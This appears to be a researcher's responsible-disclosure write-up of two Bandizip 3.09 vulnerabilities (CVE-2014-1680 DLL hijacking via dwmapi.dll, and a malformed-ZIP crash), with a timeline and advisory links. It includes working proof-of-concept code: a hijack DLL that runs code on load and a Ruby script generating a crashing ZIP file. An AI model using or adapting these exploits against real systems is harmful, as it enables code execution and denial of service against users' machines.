All these issues are patched in Bandizip 3.10 after a responsible disclosure done to the vendor.
Overview of Bandizip
Bandizip is a Lightweight, Fast and 100% free All-In-One Zip Archiver. It has a very fast Zip algorithm for compression & extraction with Fast Drag and Drop, High Speed Archiving, and Multi-core compression. It handles the most popular compression formats, including Zip, 7z, Rar, and so on.
Arbitrary DLL Injection Code Execution
Bandizip 3.09 and below version are affected with a DLL hijacking issue in which the application loads dwmapi.dll in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into e.g. opening a file located on a remote WebDAV or SMB share. You can clearly see dwmapi.dll is being searched by the application in the current directory as a result of loading it in an insecure manner.
Proof of Concept
/* * Exploit Title: Bandizip 3.09 DLL Hijacking Exploit (dwmapi.dll) * Date: February 5th 2014 * Author: Osanda Malith Jayathissa * E-Mail: osandajayathissagmail.com * Version: 3.09 * Vendor Homepage: http://www.bandisoft.com/ * Tested on: Windows XP SP2 en * Vulnerable extensions: All Extensions * CVE: CVE-2014-1680 */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "Bandizip DLL Hijacked\nOsanda Malith", "POC", MB_OK); }
Vulnerability Information
Class: DLL Hijacking [CWE-427]
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2014-1680
Advisories
[1] http://www.bandisoft.com/bandizip/history/
[2] http://secunia.com/advisories/56846/
[3] http://www.osvdb.org/show/osvdb/102979
[4] http://packetstormsecurity.com/files/cve/CVE-2014-1680
Report Timeline
2014-01-19: Contacted the Vendor
2014-01-23: Issue fixed and acknowledged.
2014-01-24: Bandizip 3.10 Released
2014-01-25: Contacted MITRE and obtained a CVE-ID
.Zip Crash
I also found out that Bandizip 3.09 and below versions are affected with a file format crash in which attackers can crash the application remotely.
Proof of Concept
#!/usr/bin/env ruby # Exploit Title: Bandizip 3.09 .zip Crash POC # Date: February 6th 2014 # Author: Osanda Malith Jayathissa # E-Mail: osandajayathissa<at>gmail.com # Version: 3.09 # Vendor Homepage: http://www.bandisoft.com/ # Tested on: Windows XP SP2 en =begin eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000 eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 770be1a4 c21400 ret 14h =end # Ensure we have valid ZIP Header lf_header = "\x50\x4B\x03\x04\x14\x00\x00" lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00" lf_header += "\xe4\x0f" #file size lf_header += "\x00\x00\x00" cdf_header = "\x50\x4B\x01\x02\x14\x00\x14" cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00" cdf_header += "\xe4\x0f" # file size cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00" cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00" eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes) eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory,relative to start of archive eofcdf_header += "\x00\x00" # Our Payload payload = "A" * 4064 payload += ".txt" Exploit = lf_header + payload + cdf_header + payload + eofcdf_header f=File.open('bandizip.zip', 'w') f.write(Exploit) f.close #EOF
Report Timeline
2014-01-19: Contacted the Vendor
2014-01-23: Issue fixed and acknowledged.
2014-01-24: Bandizip 3.10 Released
Acknowledgements
As a result of reporting these vulnerabilities my name got published in the About dialog box in Bandizip 3.10 . Thanks to park for adding me 🙂